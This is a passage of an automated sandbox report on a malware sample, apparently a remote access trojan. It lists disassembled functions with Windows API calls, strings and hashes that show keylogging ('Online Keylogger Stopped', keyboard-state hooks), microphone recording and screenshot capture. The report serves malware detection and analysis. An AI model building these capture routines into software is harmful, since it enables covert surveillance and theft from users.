                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417DFE
                                                            • Part of subcall function 00417988: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417E11,00000000,?,?,?,?,00000000), ref: 0041799C
                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00417E4B
                                                            • Part of subcall function 004179FB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417E67,00000000,?,?), ref: 00417A0D
                                                            • Part of subcall function 004179AB: GdipDisposeImage.GDIPLUS(?,00417EC2), ref: 004179B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                          • String ID: image/jpeg
                                                          • API String ID: 1291196975-3785015651
                                                          • Opcode ID: c0c6e86b316e55d66ebf2cdb0a10bdafe60ea560917bbaebe4dfd9cc843f5356
                                                          • Instruction ID: 8af81f403c9bc23e7458ee74b157d237c4b9220e470ad7f048828f44144df9d5
                                                          • Opcode Fuzzy Hash: c0c6e86b316e55d66ebf2cdb0a10bdafe60ea560917bbaebe4dfd9cc843f5356
                                                          • Instruction Fuzzy Hash: 23313C71518204AFC301EF65C884DAFB7E9EF8A704F000A6EF98597251DB79D9098BA6
                                                          Function 00450AEE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450D49,?,00000050,?,?,?,?,?), ref: 00450BC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ACP$OCP
                                                          • API String ID: 0-711371036
                                                          • Opcode ID: 6fd782f53c9633299fe98566c4ec68ed2bffd726811d49864d22e4fe4dac6dcd
                                                          • Instruction ID: d29bb87f3b47b124c8bd6c760bb86eb4cd4ec0f84f402c6b2e0ab732353f73f5
                                                          • Opcode Fuzzy Hash: 6fd782f53c9633299fe98566c4ec68ed2bffd726811d49864d22e4fe4dac6dcd
                                                          • Instruction Fuzzy Hash: 4021F72AA00105A6E7308FD48C82B977396AB50B1BF564467ED09D7303F73AFD09C358
                                                          Function 00417ECF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417EEA
                                                            • Part of subcall function 00417988: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417E11,00000000,?,?,?,?,00000000), ref: 0041799C
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417F0F
                                                            • Part of subcall function 004179FB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417E67,00000000,?,?), ref: 00417A0D
                                                            • Part of subcall function 004179AB: GdipDisposeImage.GDIPLUS(?,00417EC2), ref: 004179B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                          • String ID: image/png
                                                          • API String ID: 1291196975-2966254431
                                                          • Opcode ID: af5d1f129cd5bd430e2235d416c6cbdfecbf91bf363856a8bd94ba4e637429f2
                                                          • Instruction ID: ee77ca1c213fe0bce41e511bbcee913114c194eb695e7cc9890245c9a4d1a3c2
                                                          • Opcode Fuzzy Hash: af5d1f129cd5bd430e2235d416c6cbdfecbf91bf363856a8bd94ba4e637429f2
                                                          • Instruction Fuzzy Hash: B9219F71204210AFC301AB61CC88DBFBBBDEFCA714B00052EF94693261DB389945CBA6
                                                          Function 00449A39 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: P*G$T*G
                                                          • API String ID: 269201875-829108958
                                                          • Opcode ID: 2f751c0efca173fa551c184794475f0d61f37e7d68ea2317de90041697b8eca5
                                                          • Instruction ID: a7437cf58198a632dccd7940a762e636932f246661e7801d2bdfb2ecead32fa8
                                                          • Opcode Fuzzy Hash: 2f751c0efca173fa551c184794475f0d61f37e7d68ea2317de90041697b8eca5
                                                          • Instruction Fuzzy Hash: 6111E4711443429FFB20DF26D441B53B3E8EB55368B30842FE48A9B281DB78AC859788
                                                          Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,00474EE0,004755B0,?,?,?,?,?,?,?,00414F0F,?,00000001,0000004C,00000000), ref: 004049F1
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • GetLocalTime.KERNEL32(?,00474EE0,004755B0,?,?,?,?,?,?,?,00414F0F,?,00000001,0000004C,00000000), ref: 00404A4E
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 481472006-1507639952
                                                          • Opcode ID: 7b17d1e227f48684207d6be12f6d8554e6a2daeb87b5d1524601f4e1b57e679e
                                                          • Instruction ID: 07f09c1926c096f578aeb4a964dedba27d52497869334d5e310e707c12b0f234
                                                          • Opcode Fuzzy Hash: 7b17d1e227f48684207d6be12f6d8554e6a2daeb87b5d1524601f4e1b57e679e
                                                          • Instruction Fuzzy Hash: 932131B1A042806BD600F77A980635B7B9497C4314F84043FE90C562E2EEBD59898BAF
                                                          Function 00448B07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00448B53
                                                          • GetFileType.KERNEL32(00000000), ref: 00448B65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileHandleType
                                                          • String ID: 0Qd
                                                          • API String ID: 3000768030-844494294
                                                          • Opcode ID: 709764ea7de61a1ee6b1c7a208d8f310102b3ec00a3095b3a15ed26258e7c2c3
                                                          • Instruction ID: 4d96847604c3c5e89c92e0bae5a56447120e6fba85ff24299cab8e9791f5b951
                                                          • Opcode Fuzzy Hash: 709764ea7de61a1ee6b1c7a208d8f310102b3ec00a3095b3a15ed26258e7c2c3
                                                          • Instruction Fuzzy Hash: E71196B15047814EE7304A3D8C8962B6A54D752334B38071FF5B6967F1CF28E882924D
                                                          Function 0043AE40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: 0Qd
                                                          • API String ID: 269201875-844494294
                                                          • Opcode ID: d7be576e25eb8f91f1c7522a8e83579c420102f8c2aee4373051d9f21f228018
                                                          • Instruction ID: bbcf2e6bbb9829bcdebbaa4262a7be325da62559df7761f078343b1b3ea7e5ad
                                                          • Opcode Fuzzy Hash: d7be576e25eb8f91f1c7522a8e83579c420102f8c2aee4373051d9f21f228018
                                                          • Instruction Fuzzy Hash: EF11B471A803114AE7245F39BD42F563254E704734F15122BEA79DB2E0E7BCC8C2568A
                                                          Function 0041A891 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                          • API String ID: 481472006-2430845779
                                                          • Opcode ID: 93a98d44db7fb0c881bd96abbdce9d50535dabea07bf117fefb48cdc9cbc8cb7
                                                          • Instruction ID: bea5c42f2d95e84a76b62dfc34e9438b8882b4e2d456746f57979f9b7964cbe7
                                                          • Opcode Fuzzy Hash: 93a98d44db7fb0c881bd96abbdce9d50535dabea07bf117fefb48cdc9cbc8cb7
                                                          • Instruction Fuzzy Hash: 0F114C725082405BC704EBA5D8969BF77E8AB94708F10093FF885A31E1EF38DA44C69E
                                                          Function 004126C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004126EA
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412720
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID: TeF
                                                          • API String ID: 3660427363-331424825
                                                          • Opcode ID: d95fd9167a1313fe8c80bfc7e96c72c6aa8b9b847f69a2249def5cc6c104aaba
                                                          • Instruction ID: 3cb62dd7824af05a29d95bf947337739d939994cfcf273d244ad568f401b79ba
                                                          • Opcode Fuzzy Hash: d95fd9167a1313fe8c80bfc7e96c72c6aa8b9b847f69a2249def5cc6c104aaba
                                                          • Instruction Fuzzy Hash: 650184B6A00108BFEB05AB95DD46EFF7ABDEB44240F14007AF901E2241E6B0AF049664
                                                          Function 0041A07F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041A0A4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: TeF$alarm.wav
                                                          • API String ID: 1174141254-486219832
                                                          • Opcode ID: f7ee6337fc654cc0b09d6f8c04168479c952f1b1aa7db7e8f0e02e837cc1a088
                                                          • Instruction ID: 6b61ed94da76c6dc8509722386f9763649bd27766d5c45ddbf5277e073f3d638
                                                          • Opcode Fuzzy Hash: f7ee6337fc654cc0b09d6f8c04168479c952f1b1aa7db7e8f0e02e837cc1a088
                                                          • Instruction Fuzzy Hash: 4D01D23160520166C604B636D8576EE3A458BC0728F50813FF88A666E2EF7CAED5C2DF
                                                          Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                          • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                          • String ID: Online Keylogger Stopped
                                                          • API String ID: 1623830855-1496645233
                                                          • Opcode ID: 908f31768a51f4bba0f1177a467c2c11ec0582f6bfe0bae760a55f80d2203bb8
                                                          • Instruction ID: da65c2120251a34d34924486d515db36f90714a8cba0a7d82e96ebed52376b78
                                                          • Opcode Fuzzy Hash: 908f31768a51f4bba0f1177a467c2c11ec0582f6bfe0bae760a55f80d2203bb8
                                                          • Instruction Fuzzy Hash: 5901F131A043019BCB25BB35C80B7AEBBB19B45314F40406EE441225D2EB7999A6C3DF
                                                          Function 00448973 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00444CDC: EnterCriticalSection.KERNEL32(-00472558,?,0044246B,00000000,0046EAD0,0000000C,00442426,0000000A,?,?,00448949,0000000A,?,00447184,00000001,00000364), ref: 00444CEB
                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046ECB8,00000010,0043AF25), ref: 004489D5
                                                          • _free.LIBCMT ref: 004489E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$DeleteEnter_free
                                                          • String ID: 0Qd
                                                          • API String ID: 1836352639-844494294
                                                          • Opcode ID: 9d76c620edcff08112ad37d792de4fd9c43109646451596060a8f89fb46b25c4
                                                          • Instruction ID: 148d79857643bc82b319f24316268943629f83d9e3709ab7633481e59fa6f6a8
                                                          • Opcode Fuzzy Hash: 9d76c620edcff08112ad37d792de4fd9c43109646451596060a8f89fb46b25c4
                                                          • Instruction Fuzzy Hash: F51161715002119FE715DFA9E946BAD73B0FB08724F11411EE5A5AB2E2CF7CE8829B0D
                                                          Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • waveInPrepareHeader.WINMM(0063F360,00000020,?,?,00000000,00476B98,00474EE0,?,00000000,00401913), ref: 00401747
                                                          • waveInAddBuffer.WINMM(0063F360,00000020,?,00000000,00401913), ref: 0040175D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferHeaderPrepare
                                                          • String ID: XMG
                                                          • API String ID: 2315374483-813777761
                                                          • Opcode ID: 620c8429846d9d472bb74b0b690090328b51b047c9fc1556c206adb706f1508e
                                                          • Instruction ID: 26799fbdff8c3ec01ad48014b311b0d3f370155dffc0330205344997a7b0d52a
                                                          • Opcode Fuzzy Hash: 620c8429846d9d472bb74b0b690090328b51b047c9fc1556c206adb706f1508e
                                                          • Instruction Fuzzy Hash: 6501AD71300300AFD7209F39ED45A69BBB5EF89315B00413EB808E33A2EB74AC50CB98
                                                          Function 004479A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsValidLocale.KERNEL32(00000000,z?D,00000000,00000001,?,?,00443F7A,?,?,?,?,00000004), ref: 004479EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocaleValid
                                                          • String ID: IsValidLocaleName$z?D
                                                          • API String ID: 1901932003-2490211753
                                                          • Opcode ID: 030ca6b5b062e3e6eb463140e6e5805cf12db518d0019a9c378278714199a4d0
                                                          • Instruction ID: 892bc6e93789200f6c95030ba230210178196c8f1f686432b442ac7872abfc60
                                                          • Opcode Fuzzy Hash: 030ca6b5b062e3e6eb463140e6e5805cf12db518d0019a9c378278714199a4d0
                                                          • Instruction Fuzzy Hash: 06F0E930645218B7DB186F258C06F5E7B95CB05716F50807BFC047A293DE794E0295DD
                                                          Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: XMG$XMG
                                                          • API String ID: 3519838083-886261599
                                                          • Opcode ID: 94d942c2b9cd7cd452367b65107360caec8e392a141153fe325b9bee2a1bda9b
                                                          • Instruction ID: 0a877421dfc5135a28098138b17ad9f721677e320a6d1c8a6a2adbe775497da7
                                                          • Opcode Fuzzy Hash: 94d942c2b9cd7cd452367b65107360caec8e392a141153fe325b9bee2a1bda9b
                                                          • Instruction Fuzzy Hash: D4F0E9B1B00211ABC715BB65880569EB768EF41369F01827FB416772E1CFBD5D04975C
                                                          Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                            • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,00475108), ref: 00409B3F
                                                            • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                            • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                            • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                            • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,00475108), ref: 00409B67
                                                            • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047515C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                            • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
